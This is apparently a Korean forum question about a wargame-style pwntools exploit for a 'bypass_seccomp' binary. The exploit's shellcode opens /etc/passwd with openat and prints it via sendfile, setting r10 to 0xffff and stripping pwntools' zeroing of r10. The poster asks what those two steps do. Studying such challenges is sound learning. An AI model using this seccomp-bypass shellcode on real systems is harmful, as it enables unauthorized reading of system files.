완료됨
bypass_seccomp 익스플로잇 코드
from pwn import *
context.arch = 'x86_64'
p = process("./bypass_seccomp")
shellcode = shellcraft.openat(0, "/etc/passwd")
shellcode += 'mov r10, 0xffff'
shellcode += shellcraft.sendfile(1, 'rax', 0).replace("xor r10d, r10d","")
shellcode += shellcraft.exit(0)
p.sendline(asm(shellcode))
p.interactive()
위 코드에서 "mov r10, 0xffff"는 어떤 의미인지 sendfile 뒤 replace("xor r10d, r10d", "")는 왜 쓰이는 건가요?
#시스템해킹
#공격기법
#seccomp
작성자 정보